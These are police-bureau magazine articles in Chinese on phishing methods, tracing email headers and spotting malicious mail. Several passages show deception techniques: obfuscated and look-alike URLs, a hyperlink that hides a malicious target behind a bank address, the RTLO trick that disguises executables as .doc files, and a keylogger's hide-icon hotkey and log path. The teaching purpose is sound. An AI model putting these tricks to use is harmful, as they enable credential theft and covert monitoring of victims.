虛設帳戶交易並使用信用卡支付，

使資金流入第三方支付帳戶後，再

移轉至銀行帳戶，以提領現金等。

種種問題都尚待主管機關如何訂定

有效之管理辨法，以達到產業、民

間及政府三贏之局面。


18


網路釣魚多利用假冒網站、社交工程和

人性以成功引人入洞。

上網之餘應提高警覺，並練就火眼金

睛，辨別惡意連接。

淺談網路釣魚之

犯罪手法文、圖／李慶憲（刑事局資訊室）

話說在○○百貨工作的小資

女孩，她心裡有個夢想：擁有一間

完完全全屬於自己的房子，再接爸

媽一起來住。有一天她收到╳╳銀

行的一封電子郵件，內容寫道：

「親愛的存戶，最近網路詐騙事件

頻傳，為了防止您的名義遭人冒

用，本行增設防冒辨識系統，請即

配合更新帳號資料，確保權益。如

果您未更新資料，因恐有冒用之

虞，本行將刪除此帳號，維護存戶

權益。請遵循下列連結，確認您的

資料。」

看到這裡，你知道當小資女

孩點選這個超連結的結果會是如

何？不知道！那請你繼續看下去。

知道！那也請你繼續看下去，看看

結果是不是和你所想的一樣。

何謂網路釣魚

網路釣魚（Phishing）是一種

攻擊者仿造知名公司、銀行的網

站，再以垃圾郵件、即時通訊或關

鍵字廣告等社交工程方式，引誘使

用者連結上其所偽造的假頁面，藉

此騙取被害者個人機密資訊。

網路釣魚技術最早於1987年

問世，而首度使用「網路釣魚」

這個術語是在1996年。Phishing是

源自「phreak飛客」和「fishing釣

魚」的結合，意味著放線釣魚以

「釣」取被害者財務資料和密碼。

網路釣魚手法

在說明網路釣魚手法之前，

你可以清楚辨識圖1中，哪一個網

址是有問題的嗎？

網路釣魚手法千奇百怪，但

是它的成功方程式不外乎為：假冒

網站＋社交工程＋人性。首先攻擊

者會先偽造知名網站的網頁或是

利用網站本身的漏洞植入木馬等

惡意程式，接下來就是請被害者入

甕囉。一般攻擊者會利用電子郵


圖1　哪個網址有問題？

20


件或即時通訊等方式，結合時事

或其他事件，加以編寫與被害者

相關聯的訊息並寄發給被害者，

如上述小資女孩收到╳╳銀行的

電子郵件內容。最後再利用被害

者脆弱的人性，點選了電子郵件

所附的超連結，被連結至惡意網

站，掉入攻擊者所設下的陷阱，

一點一滴地將個人機敏資料洩漏

出去。目前網路釣魚手法簡述如

下：

短網址

網路上所使用網址有些太

過於冗長以及微網誌的盛行，而

微網誌的文字輸入數量，大多都

限制在140個字，所以為了方便

網友記憶、分享，因此就有網站

（如Google、McAfee…）提供短

網址的服務。但是短網址通常都

是無意義的編碼，同時短網址的

名稱隨時都在變動，在我們按下

短網址之前，是無法得知會被連

結到哪個網站（如http://goo.gl/

FDGL。你看得出這是哪個網站

的短網址嗎？），因此，惡意網

站就可以利用此種方式來進行散

布。

關鍵字廣告

一般使用者在找尋商品或資

料時，通常會在搜尋引擎內輸入

想要的商品或資料的簡稱，而使

用者會選擇前幾頁的網站進入，

尤其是第一頁出現的網站。因此

搜尋引擎業者提供關鍵字廣告版

位，讓商家競標適合他們商品的

「關鍵字」，當使用者輸入「關

鍵字」時，商家的介紹就會出現

在結果頁最顯眼的廣告區域，讓

使用者更容易進入商家的網站，

獲得他們找尋的資料。所以惡

意網站除了傳統藉由電子郵件的

傳遞外，攻擊者近年來也會利用

關鍵字廣告的行銷來進行誘騙，

在各大搜尋網站買下熱門的關鍵

字，使其惡意網站能夠出現在搜

尋結果的最上方，誘騙使用者點

擊，如圖2所示。

圖2　關鍵字廣告（資料來源：Yahoo!奇摩網站）


偽裝（混淆）網址

上述圖1就是一種混淆網址的

網路釣魚方式，看出來了嗎？左

邊的網址是有問題的。這是利用

相似的文字或數字來混淆被害者

的眼睛，像相似字眼：1－l、0－

O、C－G、w－vv、m－rn…，這

其中可以玩弄的手法實在多到不

行。

我們知道網址列上的網域名

稱，是為了讓人們方便記憶（如

http://www.cib.gov.tw），但是實

際上要連結至網站，還是要透過IP

位址（如，http://210.69.153.1。

這些數字你記的起來嗎？），

而這 I P 位址可以使用十進

制、十六進制來表示（h t t p : / /

3527776513），也是可以連結至

網站。

另外，在網址列上輸入

http://www.microsoft.com@www.

google.com，你覺得會被連結

至微軟網站還是Goog le網站。

答案是Google網站，其中www.

microsoft.com其實是登入Google

網站的帳號而不是網址。尤其有

些惡意網址會將字母編碼成相應

的ASCII碼（如：http://%77%77

%77%2E%69%74%2E%63%61/

%63%67%69%2D%62%69%6E/

%6D%61%69%6C%66%6F%72

%6D%2E%63%67%69），那你

仍會注意這個異常而不點選嗎？

網址嫁接（Pharming）

上面提到實際要連結至網

站，還是要透過 IP位址，所以在

網址列上輸入的網域名稱，是需

要透過DNS（網域名稱伺服器）

的協助，來查詢出該網域名稱

的 IP位址，DNS伺服器的功用就

是儲存著網域名稱與 IP位址的對

應關係（如www.cib.gov.tw

210.69.153.1）。而網址嫁接手法

就是攻擊者利用DNS伺服器本身

的漏洞，進行所謂的DNS Cache

Poisoning攻擊，去更改DNS伺

服器儲存的網域名稱與 IP位址正

確對應關係，使其儲存的資料產

生錯誤（如www.cib.gov.tw

240.9.54.27）。即使被害者自行

輸入正確的網域名稱，也會被對

應到錯誤的IP位址，連結至惡意網

站。

電子郵件超連結

HTML語法中，超連結的結構

為圖3所示：

一般來說，上述超連結的

HTML語法中，實際連結（actual

link）部份是看不到的，像圖4中

小資女孩收到有人冒用╳╳銀行

名義所寄出的電子郵件，你會發

現該信件內容因為某些原因會附

上一段超連結，這時在信件內容

所看見的超連結，只有可見連結

圖3　超連結HTML語法

圖4　電子郵件內容示意圖

22


（visible link）部份，而實際連結

部份是看不到的，若想要看到實際

連結部份的話，可將滑鼠移至可見

連結上，在畫面左下方就可以看到

實際連結了。

因此冒用╳╳銀行名義所寄

出的電子郵件，它的超連結HTML

語法實際上為<a href="http://www.

shakeleavesx.com">http://www.

botcxbank.com.tw/default.htm/</

a>，所以當小資女孩點選這超連結

時，她所前往的網站不是╳╳銀行

網站，而是一個惡意網站。當然實

際連結部份也可以結合上述「偽裝

（混淆）網址」手法，攻擊者將陷

阱挖大一點，等待你跳下來。

網路釣魚防護

上面只是簡述一些網路釣魚

手法，而這些手法可以交互運用進

而產生加乘效果，因此當你正在享

受網路所帶來的便利性時，若你沒

有足夠警覺心的話，你以為你跳過

這一個陷阱，孰不知你正往另一個

陷阱跳下去。

我們都知道要安裝防毒軟

體、定時更新等防護方式，但這只

是協助我們降低被釣的機會，難道

面對網路釣魚這種惡意行為，我們

只能處於挨打的狀態、見招拆招

嗎？上面提到網路釣魚成功的3要

素：假冒網站、社交工程、人性，

其中假冒網站、社交工程這兩要素

是由攻擊者掌握的，他們依據人性

以及網路軟硬體的缺失，設計出各

式各樣的詐騙方式，引誘被害者貢

獻出自己的機敏資料。而我們能掌

握的要素是自己的人性（如不起貪

念、不起好奇心…），就能克制千

奇百怪的網路釣魚手法，即使這手

法尚未出現，自己也會完全遠離網

路釣魚的危害。所以在開啟電子郵

件前，請先想想下面3個問題：

● 我為何會收到這封郵件？

● 我是不是應該收到這封郵件？

● 我是不是有必要開啟附件或點

選連結？

結論

看到這裡，你是不是可以知

道小資女孩點選超連結的結果或是

結果和你想的一樣。沒錯，她若是

沒有警覺心而點選這惡意連結之

後，她的夢想將會離她越來越遠

了。

根據反網路釣魚小組（Anti-

P h i s h i n g W o r k i n g G r o u p，

APWG）的統計，有心人士一次寄

出上萬封惡意郵件，大約會有5％

的成功率，也就是說一萬封中會有

五百人點選連結或開啟附件。尤其

當惡意郵件是由你認識的人寄給你

或是手法及技巧更高明的時候，你

仍會保持警覺心去決定是否開啟這

封信件、能不受騙上當嗎？因此，

當你收到標題聳動或是免費提供軟

體程式的郵件或網站時，滑鼠千萬

得hold住，並且需要「多加查證」

及「不隨意開啟」，這是避免網路

釣魚侵襲的基本觀念。


電子郵件來源解析前言

第一封電子郵件在1971年發

出，距今已經過了40年，根據瑞典

網路監測機構Pingdom所發表2011

年全球網路產業發展報告，全球電

子郵件帳戶總數約有31.46億，平

均每位企業客戶每天收發的電子郵

件數量約有112封，且統計至2011

年11月止，全球郵件中垃圾郵件所

佔比例約有71％。

目前電子郵件已成為你我對外

聯繫的重要管道。同時，許多惡意

行為（如網路詐騙、網路釣魚、妨

害名譽⋯⋯）也透過電子郵件來進

行，危害金融、社會秩序。本文將

藉由判讀郵件標頭資訊，追蹤電子

郵件的來源與傳遞路徑，並提出分

辨電子郵件是否為假冒的方法。

電子郵件相關說明

以下將針對電子郵件相關內容

進行說明：

電子郵件系統組成、功能

電子郵件系統是由郵件伺服器

（Mail Transfer Agent；MTA）、信

箱、電子郵件應用程式（Mail User

Agent；MUA）三部份所組成。

表1　電子郵件系統組成、功能

名稱功能

郵件伺服器（MTA）

● 接收用戶端傳送的信件，再根據收件者電子郵件地址，將信件轉送至下一個郵件伺服器。

● 接收上一個郵件伺服器轉送的信件至用戶端。

信箱

● 指的是用戶端在郵件伺服器內的信件儲存空間。

● 用戶需有帳號、密碼才能閱讀信箱中的信件。

電子郵件應用程式（MUA）

● 指的是用戶端所使用的軟體（如：Outlook Express）。

● 負責建立、發送信件及接收、管理信件。

文、圖／李慶憲（刑事局資訊室）

藉由郵件標頭中包含的IP、主機名稱、日期等許多有用資訊，可拼湊出攻擊者

位置並做為呈堂證據。

24


電子郵件位址格式

電子郵件地址設定格式為

「帳戶名稱@網域名稱」（如

[email protected]）。帳戶名稱是用

戶端在MTA的信箱名稱，該名稱在

此MTA是唯一的；而網域名稱在整

個電子郵件系統則是唯一的。

電子郵件協定（SMTP、POP3）

SMTP（Simple Mail Transfer

Protocol；簡易郵件傳送協定）正

如它的名稱，它的功用就是進行信

件傳送。用戶端使用 SMTP 向其

MTA傳送信件，由MTA確認該信件

是以本機信箱為目的地還是應將

該信件傳送到另一臺MTA上。如果

MTA認為該信件需轉送到其他MTA

的話，則在MTA之間同樣要使用

SMTP。

POP3（Post Office Protocol

ver 3；郵局通訊協定第三版）的功

用與IMAP相同，皆是用來進行信件

接收，但是使用POP3的MTA，在信

件被用戶端接收後，預設情況下，

會自動刪除儲存在MTA內的信件，

但使用IMAP的MTA則會保留該信

件，直至用戶手動刪除這些信件。

電子郵件傳送原理

在了解電子郵件的組成、協

定等之後，接下來說明電子郵件傳

送原理，如圖1所示。

同一網域電子郵件傳送

假設寄件者欲傳送電子郵件

至收件者（甲），而寄件者與收件

者（甲）信箱都位於同一個郵件伺

服器A。步驟如下：

● 寄件者編寫信件完畢之後，則

利用SMTP將信件傳送至郵件伺

服器A。

● 郵件伺服器A藉由收件者電子郵

件地址判斷收件者屬於本地網

路的使用者，因此這封信件就

圖1　電子郵件傳送原理

收件者（甲）

郵件伺服器A郵件伺服器B

收件者（乙）

POP3POP3

SMTP

SMTP

寄件者

DNS伺服器

名稱解析


直接傳送至收件者的信箱。

● 收件者利用POP3連接至郵件伺

服器A，將信件下載至收件者電

腦。

不同網域電子郵件傳送

假設寄件者欲傳送電子郵件

至收件者（乙），而寄件者與收件

者（乙）位於不同網路。步驟如

下：

● 寄件者編寫信件完畢之後，則

利用SMTP將信件傳送至郵件伺

服器A。

● 經過郵件伺服器A判斷，若收件

者屬於遠端網路使用者，則郵

件伺服器A先向DNS 伺服器要

求解析遠端郵件伺服器B的IP位

址。

● 郵件伺服器A得到遠端郵件伺服

器B的IP位址後，則利用SMTP

將信件傳送至郵件伺服器B。

● 郵件伺服器B判斷收件者屬於本

地網路的使用者，因此這封信件

就直接傳送至收件者的信箱。

● 收件者利用POP3連接至郵件伺

服器B，將信件下載至收件者電

腦。

電子郵件標題解析

一封完整的信件是由郵件標頭

（Mail Header）及郵件主體（Mail

Body）所組成。郵件主體是寄件者

所要表達的訊息，這訊息可以是純

文字，也可以是非英語字元和二進

制文件（如圖像、聲音等）。

至於郵件標頭則涵蓋信件傳

遞的過程與相關資訊，包含信件在

網路上所經過的MTA、IP位址、所

使用的版本、寄收信件的時間、寄

件者及收件者電子郵件位址等。藉

由判讀郵件標頭資訊，可以追蹤電

子郵件的來源與傳遞路徑，並分辨

電子郵件是否為假冒。當然不是每

種MTA都提供一樣的訊息，根據每

種不同版本而略有差異。

當我們使用M U A編寫信件

時，一般會輸入寄件者及收件者電

子郵件地址、主旨、信件內容等資

料。注意：因為這些資料是由寄件

者自行填寫的，所以資料可能是有

問題的。如圖2所示。

要如何知道該信件的郵件標

頭內容？依據所使用的MUA，顯

示郵件標頭方式會有所不同。在此

以Outlook Express為例，如圖3所

示，點選該信件，再依序選擇「檔

案」、「內容」、「詳細資料」，

可以看到圖2寄件者所輸入的欄位

資料。

在圖4左邊所示為用戶端傳送

信件時的郵件標頭，而圖4右邊為

用戶端接收信件時的郵件標頭。可

以看出右邊的郵件標頭比左邊的郵

件標頭多出Received及Message-

ID資料，而這兩個資料是由MTA所

提供的，而所謂判讀郵件標頭資

訊，追蹤電子郵件的來源與傳遞路

徑，最主要就是去了解這兩個資料

所表示的意義。表2為郵件標頭各

欄位說明。

圖2　電子郵件應用程式（MUA）畫面

26


表2介紹Received 欄位作用像

是郵戳，透過該欄位資訊，可瞭解

信件在網路上完整的傳送路徑。一

封電子郵件所經過的MTA皆會在該

電子郵件的郵件標頭寫下Received

資訊，而閱讀Received資訊，應該

是「由下往上」，才是真正傳送路

徑順序。表3為Received欄位關鍵

字說明。

Message-ID是由3個部分組

成：唯一編號、「@」符號、主

機名稱。Message-ID雖是唯一識

別代號，但是RFC 5322並未規定

Message-ID要包含哪些資訊，因

此不同的MUA與MTA都有屬於自己

From: "李慶憲" <[email protected]>To: "駱業華" <[email protected]>References: <[email protected]>Subject: Re: mailDate: Mon, 6 Feb 2012 10:00:59 +0800MIME-Version: 1.0Content-Type: multipart/alternative; boundary="----=_NextPart_000_0013_01CCE4B6.39ED1000"X-Priority: 3X-MSMail-Priority: NormalX-Mailer: Microsoft Outlook Express 6.00.2900.5843Disposition-Notification-To: "李慶憲" <[email protected]>X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579

Received: from DPC008115 (10.150.8.115) by Exchange1.cib.gov.tw (10.150.101.21) with Microsoft SMTP Server id 14.1.323.3; Mon, 6 Feb 2012 09:58:51 +0800Message-ID: <[email protected]>From: =?big5?B?wGS3frXY?= <[email protected]>To: =?big5?B?p/W8eb7L?= <[email protected]>Subject: mailDate: Mon, 6 Feb 2012 09:58:50 +0800Content-Type: multipart/alternative; boundary="----=_NextPart_000_001F_01CCE4B5.ED014A40"X-Mailer: Microsoft Outlook Express 6.00.2900.5512X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579Return-Path: [email protected]: Exchange1.cib.gov.twX-MS-Exchange-Organization-AuthAs: InternalX-MS-Exchange-Organization-AuthMechanism: 07X-Originating-IP: [10.150.8.115]MIME-Version: 1.0

圖4　郵件標頭內容比較

From: "AAA" <[email protected]>To: <[email protected]>Cc: <[email protected]>Bcc: <[email protected]>Subject: 測試信Date: Mon, 16 Jul 2012 14:18:34 +0800MIME-Version: 1.0Content-Type: multipart/alternative; boundary="----=_NextPart_000_001C_01CD635D.E29730C0"X-Priority: 3X-MSMail-Priority: NormalX-Mailer: Microsoft Outlook Express 6.00.2900.5843Disposition-Notification-To: "AAA" <[email protected]>X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579

圖3　郵件標頭內容


的Message-ID格式，甚至於同一

種MUA或是MTA會因版本不同而有

所不同。藉由這樣的特性，可以從

Message-ID內容找出信件是由哪

個MUA或MTA處理的。

郵件標頭解析範例

圖5是寄件者cr96102@cisco.

com寄給收件者hlc731021@email.

c ib.gov.tw的信件之郵件標頭內

容，寄件者在2 0 1 1年7月2 1日

18:30:39 +0800寄出這封信件。接

下來將依Received順序，敘述這封

信件經過哪些MTA以及相關訊息，

並以圖6來表示這封信件整個傳送

過程。

1. MTA（xbh -hkg -412 .apac .

cisco.com）在2011年7月21

日18:30:52 +0800記錄，從

MTA（xmb-hkg-414 .apac .

cisco.com）接收信件，而xmb-

hkg-414.apac.cisco.com的IP位

址為64.104.123.86。

2. MTA（bgl-core-3.cisco.com）

在2011年7月21日10:30 :53

G M T 記錄，從M TA（ x b h -

hkg-412.apac.c isco.com）

接收信件，而xbh-hkg-412 .

apac .c i sco .com的 IP位址為

64.104.123.69。

3. MTA（ams-iport-2.cisco.com）

在2011年7月21日10:31 :15

+0000 記錄，從MTA（bg l -

core-3.cisco.com）接收信件，

而bgl-core-3.cisco.com的IP位

址為72.163.197.18。

4. MTA（spam01.cib.gov.tw）在

2011年7月21日18:31:35 +0800

(CST ) 記錄，從MTA（ams-

iport-2.cisco.com）接收信件，

而ams-iport-2.cisco.com的IP位

址為144.254.224.141。另外，

收件者為[email protected].

gov.tw、寄件者為cr96102@

cisco.com。

5. MTA（CIBMS.c ib .gov. tw）

在2011年7月21日18:31 :51

+0800 記錄，從MTA（spam01.

c i b . g o v. t w）接收信件，而

spam01.cib.gov.tw的IP位址為

172.16.1.3。

其他說明如下：

表2　郵件標頭各欄位說明

欄位名稱說明

From 寄件者的電子郵件位址。

To 收件者的電子郵件位址。

Subject 信件主旨。

Date寄件者發出信件的時間點，通常是由MUA截取該電腦目前的電腦時間，因此該欄位僅供參考，並不能作為重要依據。

Return-Path 建議收件者回覆信件時的收件者電子郵件位址。

Cc 副本收件者的電子郵件位址。

Bcc 密件收件者的電子郵件位址。

X-Mailer所有X-開頭的Mail Header均為自行定義而非標準的Header。很多MUA軟體慣用「X-Mailer」來標示該發信者所使用的軟體名稱以及版本。

X-Originating-IP

● 寄件者真正IP位址。● 這是一個選項欄位，也就是並未規定要顯示此資料。

Message-ID

● 該資料表示此電子信件的唯一識別代號。● 通常是方便MUA作信件之間參考時或是系統管理者調閱主機紀錄檔時的一個依據。

Received

● 它屬於「追蹤（trace）」欄位，在MTA處理電子郵件完後往下傳送時，MTA必須負責在該電子郵件的Mail Header內寫下Received資訊，觀念像是郵戳。

● 而一封電子郵件會有一個至多個Received資訊。

表3　Received欄位關鍵字說明

關鍵字說明

from 表示記錄該Received欄位的MTA，是由哪個MTA或用戶接受到該電子郵件。

by 表示記錄該Received欄位的MTA的相關資訊。

with 表示記錄該Received欄位的MTA寄送信件時使用的協定。

for 表示電子郵件真正的收件者。

date/time 表示記錄該Received欄位的MTA，處理電子郵件的時間。


28


圖5　郵件標頭範例

5 Received: from spam01.cib.gov.tw([172.16.1.3] RDNS failed)by CIBMS.cib.gov.tw with Microsoft SMTPSVC(6.0.3790.3959);

Thu, 21 Jul 2011 18:31:51 +0800

4 Received: from ams-iport-2.cisco.com(ams-iport-2.cisco.com[144.254.224.141]) by spam01.cib.gov.tw with ESMTP id p6LAVY8n042993

for <[email protected]>;Thu,21 Jul 2011 18:31:35 +0800(CST)

(envelop-from [email protected])

3 Received: from bgl-core-3.cisco.com([72.163.197.18]) by ams-iport-2.cisco.com with ESMTP; 21 Jul 2011 10:31:15 +0000

2 Received: from xbh-hkg-412.apac.cisco.com(xbh-hkg-412.apac.cisco.com[64.104.123.69])

by bgl-core-3.cisco.com (8.14.3/8.14.3) with ESMTP id p6LAUr1F022132;

Thu, 21 Jul 2011 10:30:53 GMT

1 Received: from xbh-hkg-414.apac.cisco.com([64.104.123.86]xbh-hkg-412.apac.cisco.com with Microsoft SMTPSVC (6.0.3790.4675);

Thu, 21 Jul 2011 18:30:52 +0800

X-MimeOLE: Produced By Microsoft Exchange V6.5

Content-class: urn: content-classes: message

MIME-Version: 1.0

Content-Type: multipart/related;

type="multipart/alternative";

boundary="----_=_NextPart_001_01CC4791.3D1B21BB"

S u b j e c t : = ? b i g 5 ? B ? R l c 6 I L L E p E O p o b X Yp u + s 1 7 r 0 u P S n 3 q /

gxHbByS0tLb3QusumzdLP4plc=?=

Date: Thu. 21 Jul 2011 18:30:39 +0800

Message-ID:<517DF2F4BE8BE7438BA4F8FBB01C1238B02E57@xmb-

hkg-414.apac.cisco.com>

X-MS-Has-Attach:

X-MS-TNEF-Correlator:

Thread-Topic: =?big5?B?ssSkQ6mhtdim76zXuvS49Kfer+DEdsHJLS04tvdC6ybN

0s/imVw==?=

Thread-Index: AcxHkR/u+50ChABqRuW/iW5uXZXWyQAAAsVg

X-Priority: 1

Priority: Urgent

Importance: high

From:"Cr Chim -X(cr96102)"<[email protected]>

Bcc:

X - O r i g i n a l A r r i v a l T i m e : 2 1 J u l 2 0 1 1 1 0 : 3 0 : 5 2 . 0 9 7 2 ( U T C )

FILETIME=[445DA6C0:01CC4791]

X-DNSPBL:

X-MAIL: spam01.cib.gov.tw p6LAVY8n042993

Return-Path: [email protected]

寄件者

[email protected]收件者

[email protected]

2011年7月21日18:30:39+0800

xmb-hkg-414.apac.cisco.com

64.104.123.86 64.104.123.69 72.163.197.18 144.254.224.141 172.16.1.3 10.150.0.15

xbh-hkg-412.apac.cisco.com bgl-core-3.cisco.com ams-iport-2.cisco.com spam01.cib.gov.tw CIB<S.cib.gov.tw

2011年7月21日18:30:52+0800

2011年7月21日18:30:53 GMT

2011年7月21日18:31:15+0000

2011年7月21日18:31:35+0800(CST)

2011年7月21日18:31:51+0800圖6　信件傳輸路徑

● 在本刊第27期「數位世界之刑案

現場調查（下）」文中曾提到：

「正確的時間序列在刑案偵查上

扮演了一個極重要的角色，是故

在處理檔案的時間戳記時須注意

時區設定是否正確⋯⋯」一般常

聽到的時區名稱約有GMT（格

林威治標準時間）、UTC（世界

標準時間）、CST（中原標準時

間）等，其實UTC等於GMT，只

是UTC的時間計算過程相當嚴謹

精密。而CST比UTC早8小時，

所以CST會以+0800表示。此範

例信件是由某跨國企業寄出，

所以時間部份會有GMT與CST

的紀錄，當了解CST比GMT早

8小時，則在解讀第一、第二個

Received記錄時間，才不致產生

誤解。

圖7　nslookup指令驗證



圖9　社交工程案件標頭範例

● 從寄出信件的時間資訊，透露

寄件者和收件者是在同一個時

區內。

● 我們可以使用nslookup指令來

確認主機名稱和 IP位址是不是

偽造？如圖7所示。

圖8為惡意郵件標頭範例，有

問題的部分已以紅色標示。

● 組成Message-ID的主機名稱部

分，通常為第一個接收該信件的

MTA名稱，此處沒有主機名稱資

料，所以這封信件有問題。

● 惡意郵件的共同特性是不會告

知它的真正來源，而這封信件的

from後面沒有資料，可能原因是

攻擊者使用了垃圾郵件產生器

等軟體，來掩飾它的來源。

案例

圖9案例為假冒資安業者寄發

社交工程信件至政府單位，而若隨

意開啟該信件的附檔，則會被植入

後門程式。現在我們要知道這封信

件是誰寄出，所以就直接看最下方

Received的內容，在這裡出現帳號

及IP位址的資料，接下來我們再去

追查帳號及IP位址的相關資料，以

查出攻擊者。

結語

從上述郵件標頭解析過程

中，可以發現郵件標頭保有信件傳

遞的過程與相關資訊，包含IP、主

機名稱、日期等許多有用資訊。當

檢視攻擊者所寄發的惡意郵件，可

藉由這些資訊，拼湊出攻擊者位置

及做為呈堂證據，將其繩之以法。

另外，目前防毒軟體或垃圾

3 Received: from spam02.cib.gov.tw (172.16.1.25) by Exchange1.cib.gov.tw (10.150.101.21) with Microsoft SMTP Server (TLS) id 14.1.323.3; Fri, 20 Jan

2012 10:15:16 +0800

2 Received: from fe1.eip.bot.com.tw (fe1.bot.com.tw [210.71.212.111]) by spam02.cib.gov.tw with ESMTP id q0K2Be3t028259 for

<[email protected]>; Fri, 20 Jan 2012 10:11:40 +0800 (CST)

(envelope-from [email protected])

1 Received: from by fe1.eip.bot.com.tw with Microsoft

SMTPSVC(6.0.3790.4675); Fri, 20 Jan 2012 10:11:38 +0800

From: "=?utf-8?Q?=E8=87=BA=E7=81=A3=E9=8A=80=E8=A1=8C(Bank of

Taiwan)?="

<[email protected]>

To: <[email protected]>

Date: Fri, 20 Jan 2012 10:11:38 +0800

Subject: =?utf-8?B?57ay6Lev6YqA6KGMKOWAi+S6uinkuqTmmJPpgJrnn6XilIDlrZj

mkbrpoZ7ovYnluLPkuqTmmJM=?=

Content-Type: text/html; charset="utf-8"

Content-Transfer-Encoding: base64

Message-ID: <FE1KMnap2SAWQ8AZndK000b9c6b@ >

X - O r i g i n a l A r r i v a l T i m e : 2 0 J a n 2 0 1 2 0 2 : 1 1 : 3 8 . 0 9 6 4 ( U T C )

FILETIME=[D7FB0140:01CCD718]

X-DNSRBL:

X-MAIL: spam02.cib.gov.tw q0K2Be3t028259

Return-Path: [email protected]

X-MS-Exchange-Organization-AuthSource: Exchange1.cib.gov.tw

X-MS-Exchange-Organization-AuthAs: Anonymous

MIME-Version: 1.0

圖8　惡意郵件標頭範例


郵件過濾系統提供郵件防護功能，

以避免惡意郵件進入用戶端電腦，

但是攻擊手法日新月異，通常會利

用零時差（zero-day）的漏洞來規

避防護功能的偵測，因此我們仍需

要針對收到的郵件及其附件或連結

保持高度懷疑，在開啟郵件前，對

郵件標頭進行解析，可以協助判斷

郵件是否為合法，進而避免遭受侵

害。

30


前言

目前結合社交工程的釣魚網

站、釣魚郵件仍然非常氾濫。所謂

「社交工程」是指以影響力或說服

力來欺騙他人以獲得有用的資訊，

故與人接觸是觸發社交工程的必要

條件，而電子郵件是一項便宜、

便利的溝通管道，故成為社交工

程利用的工具。且由於釣魚網站、

釣魚郵件製作相當容易，不需要

複雜的資訊技術，造成網路釣魚

（phishing）郵件始終居高不下。

許多釣魚郵件為了避免警方日後偵

查，都是利用跳板主機進行郵件發

送。據統計，金融機構、銀行網站

是駭客最喜歡攻擊的對象，因為只

要擷取的帳戶／密碼便可能獲取金

錢上的報酬。以下本文將介紹一般

釣魚郵件之偵查方式。

透過郵件標頭讀取確認釣魚

郵件的來源

一般使用者通常使用Microsoft

outlook或是Gmail來收發電子郵

件，以下就針對此兩種收發信軟體

介紹如何透過郵件標頭的讀取，瞭

解是否可能收到釣魚郵件。

Microsoft outlook郵件標頭的

查看方式，（如圖1）透過點選郵

件，按滑鼠右鍵後選取郵件選項，


文、圖／偵查員陳俊呈（刑事局資訊室）、Acer eDC技術協助

善用免費簡單的小工具，可有效檢測出釣魚郵件及

其包含的惡意程式及對外連結。



在開啟的畫面中（如圖2），從網

際網路標題中可看到郵件標頭詳細

的資訊。

Gmail郵件標頭的查看方式，

（如圖3）透過選取郵件，再點選

郵件旁邊之下拉選單，選取顯示原

始郵件後，其開啟畫面（如圖4）

顯示郵件的原始訊息，由郵件標頭

可以清楚看到此封郵件是從何處寄

出（本圖中顯示從yahoo寄出）。

時區介紹

偵查人員為了能跟電信業者

或ISP業者精準地調閱相關資料，

必須從郵件標頭中確認發信者準

確的發信時間，為了精準的確認

時間就必須瞭解時區的意義以及

時區之間的轉換。在郵件中常看

到的時區有PDT（Pacific Daylight

Time，太平洋日光時間）、GMT

（Greenwich Mean Time，格林

威治時間）、UTC（Un ive rsa l

Time Coordinated，世界標準時

間）、CST（Chung-Uan Standard

Time，中原標準時間）。PDT等

於GMT減7小時，而臺灣時間等於

GMT加8小時（GMT+8），所以

PDT換算成臺灣時間要加15小時。

例：PDT 01:10 = GMT+8 16:10。

UTC為位於巴黎之國際度量衡局

發布之世界標準時刻，其等於

GMT，CST表示的就是臺灣時間。

圖1　Microsoft outlook郵件標頭查看方式。圖2 Microsoft outlook郵件標頭資訊。

圖3　Gmail郵件標頭查看方式圖4　Gmail郵件標頭資訊

CST為UTC加8小時。故，CST

（中原標準時間）比UTC（世界標

準時間）=GMT（格林威治時間）

快8個小時。

運用Unicode riht to left （U+202E）反轉字元之釣魚郵件

駭客常經由社交工程信件進

行攻擊，並利用各式手法誘騙使用

者執行惡意程式。使用者一旦誤點

誘騙檔案，電腦即會遭植入惡意

程式，駭客將可進一步控制該電

腦。目前發現駭客常使用的陷阱為

在檔案名稱中插入特定的Unicode

控制字元（如圖5），讓作業系統

在顯示檔案名稱時造成誤導使用

者的效果，該控制碼為不可視字

元，可控制後續字元由右至左顯示

（Right To Left Override）。駭客

將惡意程式命名為內政部組織條

例 exe.doc、內政部組織條例執行

細則 rcs.doc，並寄送出去（如圖

2），一般使用者會誤認此兩個檔

案為doc檔，但是實際上此二檔案

32


一為.exe檔、一為.scr檔，皆為可

執行檔（如圖6）。實際點選該檔

案，可由檔名中的游標位置發現端

倪。

遭遇惡意程式可運用沙箱

（Sandbox）工具當遭遇可能之惡意程式可運

用Sandbox技術來執行、模擬，避

免本機電腦遭受感染。何謂沙箱

（Sandbox）？Sandbox是一個術

語，其是用來模擬檢查電腦檔案是

否遭到未知病毒感染的技術。此技

術是讓可能的病毒程式碼在電腦內

的模擬區中執行。Sandbox具備真

正電腦中一切的資源配備，其能夠

安全的讓病毒進行複製執行，且每

一個步驟都受到監控和記錄，故透

過Sandbox可以詳細瞭解病毒的攻

擊情況，並研擬對應的防毒策略。

目前網路上有許多免費的Sandbox

可供下載使用，例如Sandboxie

（http://www.sandboxie.com/）。

鍵盤側錄程式與防止對策

駭客植入惡意程式除了竊取

重要資料外，通常也會竊取帳號、

密碼、信用卡交易資料，常見的就

是進行鍵盤側錄後，再將資料打包

外傳。

常見的鍵盤側錄工具，Home

Keylogger（免費版，http://www.

spyarsenal.com/keylogger/），

此工具可將鍵盤的輸入詳實記

錄下來，包括時間、使用者、

視窗標題、輸入內容，按H i d e

i c o n可隱藏工作列小圖示，按

C t r l + A l t + S h i f t + M可叫出小圖

示，顯示記錄的方式有兩種，按

View log或讀取C:\Program Files\

HomeKeylogger\KeyLog.txt。

而為了防止遭植入鍵盤側錄

工具可用防止鍵盤側錄的防護程

式，如Anti Keylogger Shield（免

費試用版，http://amictools.com/

v-anti_keylogger_shield.html ），

其可讓鍵盤側錄程式失效。

運用後門程式／木馬程式與

受害主機建立連線

所謂「後門程式」，是指駭

客入侵系統後預留將來進入的通

道。後門程式通常是作業系統中正

在服務的程式，一般會偽裝成熟知

的服務名稱。木馬程式是一個電

腦程式，偽裝成各種有趣的程式

（如音樂、遊戲、影片等，透過

wrappers或binders將應用軟體執

行檔與木馬程式打包成單一執行

檔）吸引使用者下載安裝，它可以

取得系統權限、騙取使用者密碼

等。

